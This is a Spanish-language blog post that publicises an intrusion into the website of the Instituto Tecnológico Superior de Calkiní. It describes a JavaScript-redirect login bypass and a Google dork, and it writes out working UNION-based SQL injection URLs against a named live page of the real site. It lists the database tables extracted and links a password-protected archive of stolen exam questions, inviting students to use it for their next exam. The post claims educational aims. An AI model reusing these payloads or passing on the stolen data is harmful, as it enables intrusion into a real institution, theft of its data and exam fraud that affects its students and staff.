itescam Posts

Instituto Tecnológico Superior de Calkiní (itescam.edu.mx) Hackeado

Es una realidad que la actualidad tecnológica representa un desafío para los presentes y futuros profesionales en el área de sistemas computacionales, pero hasta ahora en Campeche a nadie le preocupa el proceso de formación de los educandos en materia de Seguridad Informática.

A México y vuelvo a recalcar más aún a Campeche le falta mucha educación sobre seguridad informática, los usuarios de Internet o «cibernáutas» son vulnerables a los hackers dedicados a rastrear los datos en la web y robar la información de sus víctimas predeterminadas o casuales por falta de educación e ignorancia sobre el tema.

Esto deriva en que los «futuros profesionales» no tengan una preparación adecuada, y cuando adquieren un trabajo relacionado con su carrera, tienen a cometer errores y estar propensos a las «vulnerabilidades» por no estar preparados.

En mi opinión, creo que este tipo de educación se debe impartir al cursar la carrera pero ninguna Universidad se lo toma enserio. Esto no quiere decir que las Universidades sean malas, al contrario el ITESCAM es una de las Universidades más reconocidas en el estado, pero al igual que todas en el estado, se encuentra deficiente en materia de Seguridad Informática, es probable que los alumnos lleven alguna materia de esta rama, pero dudo que la persona que lo predica tenga algo de experiencia en el tema.

En fín, hoy expondré un ejemplo, cabe mencionar que lo presentado a continuación es con fines educativos con el afán de mejorar y expandir los conocimientos acerca de la seguridad.

Un hacker denominado «JAG» pudo acceder a la base de datos del ITESCAM, al sistema SYLABUS, a la web de docentes y alumnos ¿Cómo lo hizo?

1.- Fallas en verificación de sesión
2.- SQL Injection
3.- Google Hacking

Fallas en verificación de Sesión

El ITESCAM utiliza un login común para poder validad el acceso a secciones del sitio, pero hay una vulnerabilidad que permite el acceso al sistema sin tener que iniciar tu sesión, y es que generalmente en un sistema de validación utiliza redireccionamientos a través de headers en el navegador, pero por alguna razón el ITESCAM pensó que utilizar javascript para redireccionar era una buena idea.

URL: https://www.itescam.edu.mx/principal/docentes/

Al acceder directamente a la URL anterior el navegador automaticamente es «redirigido» al login:

Pero si echamos un ojo al código fuente del sitio web, podemos observar lo siguiente:

Vulnerabilidad ITESCAM

El sitio web redirige por medio de Javascript si no haz iniciado la sesión, ¿pero que pasa si desactivo el javascript en mi navegador y vuelvo a entrar a esa página? sopresa, tienes «GRANT ACCESS PRIVILEGE»

Creo que es obvio que tienes acceso a todas las opciones contenidas en el panel de docente ¿no?

Asistencia de Alumnos,Avisos,Convocatorias,Guías y Formatos,Calendario y Plazos,Horarios de Clase,Temas para Exámenes de Título,Alumnos Asesorados,Syllabus,Control de Asistencias,Consultar Curriculum,Modificación de Datos Recursos Humanos,Encuestas,Cerrar Sesión

Esto aplica de igual manera para el panel de Alumnos.

Sistema Syllabus

El Syllabus es un «SISTEMA VIRTUAL DE APOYO AL APRENDIZAJE» seré breve, claro y preciso: es una base de conocimiento donde converge toda la información educativa de la institución, documentos, presentaciones etc…

El problema es que no tienen configurado de manera correcta el apache y si a esto le aumentas el hecho del error en javascript, puedes descargarte todos los cursos de cualquier carrera, basta con curosear o hacer «Google Hacking»

http://www.google.com.mx/search?hl=es&safe=off&q=site%3Aitescam.edu.mx%2Fprincipal%2Fsylabus%2Ffpdb%2Frecursos&aq=f&aqi=&aql=&oq=

SQL Injection

Este es otro de los errores pero no el menos importante, iré directamente el grano:

http://www.itescam.edu.mx/principal/sylabus/rptSylabus.php?tipo=PDF&id_asignatura=-278%20union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema = database()/*

http://www.itescam.edu.mx/principal/sylabus/rptSylabus.php?tipo=PDF&id_asignatura=-278%20union%20all%20select%201,REACTIVO,3,4,5,6,7%20from%20REACTIVOS/*

De nueva cuenta y gracias a su sistema Syllabus se puede tener acceso a la base de datos de la institución:
Ejemplo:

  • AREAS
  • ASIGNATURAS
  • BIBLIOGRAFIAS
  • CALENDAR
  • CAPACITACIONES
  • COMPETENCIAS
  • COMUNALES
  • DOCENTES
  • EVALUACIONES
  • EXAMENESGENERADOS
  • GRUPOS
  • HISTORIAL_ACCESOS
  • MATERIAS
  • METODOLOGIAS
  • PERIODOS
  • PLAN_ESTUDIOS
  • PRERREQUISITOS
  • REACTIVOS
  • REACTIVOSEXAMENG
  • RECURSOS
  • SUBTEMAS
  • TEMAS
  • TEMP_REACTIVOS
  • UNIDADES

Si deseas descargar la tabla de reactivos para tu próximo examen lo puedes hacer aquí:

http://rapidshare.com/files/455369996/Sylabus.rar

Password: blog.puchunguis.com

Espero que algún día las instituciones le presten atención a esta materia, ya que el ITESCAM no es el único con estas vulnerabilidades, la UAC, el IT Campeche la gran mayoría de las universidades presentan errores de seguridad en sus servidores o servicios y no creo que todos los Hackers sean tan considerados y probablemente si hay una próxima intrusión se pierda información o conviertan los combiertan en servers en Zombies.

Fuente: Correo anónimo: [email protected]